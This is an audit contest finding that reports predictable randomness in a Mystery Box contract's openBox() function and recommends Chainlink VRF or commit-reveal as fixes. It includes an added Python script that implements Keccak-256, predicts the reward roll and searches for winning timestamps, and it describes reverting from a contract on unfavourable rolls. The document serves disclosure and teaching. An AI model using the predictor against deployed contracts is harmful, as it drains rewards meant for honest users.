Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: medium
Valid

Weak, Predictable Randomness in the openBox() Function (block.timestamp and msg.sender Seed Reduced Modulo 100)

Summary

The openBox() function derives a pseudo-random value from block.timestamp and msg.sender and reduces it modulo 100 to select a reward according to a probability distribution. Both seed inputs are known to, or chosen by, the caller before the transaction is mined, so the roll can be computed in advance and the reward distribution is not fair. The modulo reduction itself contributes only a negligible bias; the predictability of the seed is the real problem.

Vulnerability Details

The random value is computed as uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100. The output of keccak256 is, for all practical purposes, uniformly distributed over 2^256 values, so reducing it modulo 100 leaves a bias of only about 100 / 2^256 (2^256 mod 100 = 36, so 36 of the 100 residues have one extra preimage each); that bias is not exploitable. What is exploitable is the seed: msg.sender is chosen by the caller, and block.timestamp is public and, within the bounds validators accept, influenceable. Anyone can evaluate the same expression off-chain for their own address and a candidate timestamp, and only submit the transaction when the result lands in the reward band they want; a contract that calls openBox() can even compute the value in the same transaction and revert unless the outcome is favourable.

  • Vulnerable Code Snippet

    uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;
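The following script is an added example, not code from the contest repository or the submitter. It reproduces the contract's roll off-chain exactly as an attacker would: abi.encodePacked(uint256, address) is the 32-byte big-endian timestamp followed by the raw 20-byte address, keccak256 (original Keccak padding, not SHA3-256) is implemented inline so nothing has to be installed, and the result is reduced modulo 100. find_winning_timestamp() scans upcoming block timestamps for one whose roll satisfies a chosen predicate; modulo_bias() quantifies how small the modulo effect actually is. The sender address, the base timestamp and the "winning" band (roll >= 90) are constructed for illustration; the contract's real reward thresholds are not on this page.

```python
"""Off-chain prediction of openBox()'s reward roll (added example, not the project's code)."""

MASK64 = (1 << 64) - 1

# Keccak-f[1600] round constants and rotation offsets ROT[x][y].
RC = [
    0x0000000000000001, 0x0000000000008082, 0x800000000000808A, 0x8000000080008000,
    0x000000000000808B, 0x0000000080000001, 0x8000000080008081, 0x8000000000008009,
    0x000000000000008A, 0x0000000000000088, 0x0000000080008009, 0x000000008000000A,
    0x000000008000808B, 0x800000000000008B, 0x8000000000008089, 0x8000000000008003,
    0x8000000000008002, 0x8000000000000080, 0x000000000000800A, 0x800000008000000A,
    0x8000000080008081, 0x8000000000008080, 0x0000000080000001, 0x8000000080008008,
]
ROT = [[0, 36, 3, 41, 18], [1, 44, 10, 45, 2], [62, 6, 43, 15, 61],
       [28, 55, 25, 21, 56], [27, 20, 39, 8, 14]]


def _rol(v, n):
    return ((v << n) | (v >> (64 - n))) & MASK64


def _keccak_f(a):
    """Keccak-f[1600] permutation on a 5x5 lane array a[x][y]."""
    for rc in RC:
        c = [a[x][0] ^ a[x][1] ^ a[x][2] ^ a[x][3] ^ a[x][4] for x in range(5)]          # theta
        d = [c[(x - 1) % 5] ^ _rol(c[(x + 1) % 5], 1) for x in range(5)]
        a = [[a[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        b = [[0] * 5 for _ in range(5)]                                                # rho + pi
        for x in range(5):
            for y in range(5):
                b[y][(2 * x + 3 * y) % 5] = _rol(a[x][y], ROT[x][y])
        a = [[b[x][y] ^ (~b[(x + 1) % 5][y] & b[(x + 2) % 5][y]) for y in range(5)]   # chi
             for x in range(5)]
        a[0][0] ^= rc                                                                  # iota
    return a


def keccak256(data: bytes) -> bytes:
    """Original Keccak-256 (pad byte 0x01), which is what Solidity's keccak256 computes."""
    rate = 136  # bytes absorbed per permutation for a 256-bit output
    buf = bytearray(data) + b"\x01"
    buf += b"\x00" * (-len(buf) % rate)
    buf[-1] |= 0x80
    st = [[0] * 5 for _ in range(5)]
    for off in range(0, len(buf), rate):
        for i in range(rate // 8):  # lane i lives at x = i % 5, y = i // 5
            st[i % 5][i // 5] ^= int.from_bytes(buf[off + 8 * i: off + 8 * i + 8], "little")
        st = _keccak_f(st)
    return b"".join(st[i % 5][i // 5].to_bytes(8, "little") for i in range(4))


def encode_packed(timestamp: int, sender: str) -> bytes:
    """abi.encodePacked(uint256, address): 32-byte big-endian integer + raw 20-byte address."""
    addr = bytes.fromhex(sender[2:] if sender.startswith("0x") else sender)
    if len(addr) != 20:
        raise ValueError("address must be 20 bytes")
    return timestamp.to_bytes(32, "big") + addr


def predict_roll(timestamp: int, sender: str) -> int:
    """Exactly the contract's expression: uint256(keccak256(abi.encodePacked(ts, sender))) % 100."""
    return int.from_bytes(keccak256(encode_packed(timestamp, sender)), "big") % 100


def find_winning_timestamp(sender: str, start: int, window: int, is_win):
    """Scan candidate block timestamps and return the first whose roll is_win() accepts, else None."""
    for ts in range(start, start + window):
        if is_win(predict_roll(ts, sender)):
            return ts
    return None


def modulo_bias(modulus: int = 100, bits: int = 256) -> dict:
    """How unevenly a uniform `bits`-bit value maps onto residues mod `modulus`."""
    base, extra = divmod(1 << bits, modulus)
    return {
        "overrepresented_residues": extra,       # residues with one more preimage than the rest
        "extra_values_each": 1 if extra else 0,
        "relative_bias": 1 / base if extra else 0.0,  # about modulus / 2^bits, negligible
    }


SAMPLE_SENDER = "0x" + "11" * 20  # constructed address for the example, not a real account

if __name__ == "__main__":
    base_ts = 1_700_000_000  # constructed base timestamp; an attacker would use the next blocks
    ts = find_winning_timestamp(SAMPLE_SENDER, base_ts, 600, lambda r: r >= 90)
    print("wait until block.timestamp =", ts, "-> roll", predict_roll(ts, SAMPLE_SENDER))
    print("modulo bias of % 100:", modulo_bias())
```

The attacker needs nothing the chain does not already expose: they wait (or, as a validator, nudge the timestamp) until the predicted roll is in the band they want, then call openBox(). modulo_bias() shows why the modulo argument does not hold on its own: only 36 residues get one extra preimage out of roughly 2^249 each, a relative bias near 10^-75.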

Impact

All users of openBox() are affected. A caller who computes the roll before sending the transaction, and only calls when a favourable timestamp arrives (or checks the value from a contract in the same transaction and reverts otherwise), obtains the rarer rewards far more often than the intended distribution allows, at the expense of honest users and the protocol's reward budget.

The reward distribution is therefore not fair in any meaningful sense: it is random only from the point of view of users who do not look. This undermines trust in the reward system and can be used to drain its most valuable rewards.

Tools Used

Manual review

Recommendations

Do not derive randomness from block.timestamp, msg.sender, blockhash, or any other value a caller can know or choose before the transaction is mined.

Use a verifiable randomness oracle such as Chainlink VRF: the contract requests a random word in one transaction and receives it in a later callback together with a proof that the coordinator generated it, so neither the caller nor the block producer can select a favourable outcome in advance. A commit-reveal scheme is an alternative where an external oracle is not acceptable. Once the random word itself is unpredictable, reducing it modulo 100 is fine; the bias of a 256-bit value mod 100 is negligible.

Updates

Appeal created

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness
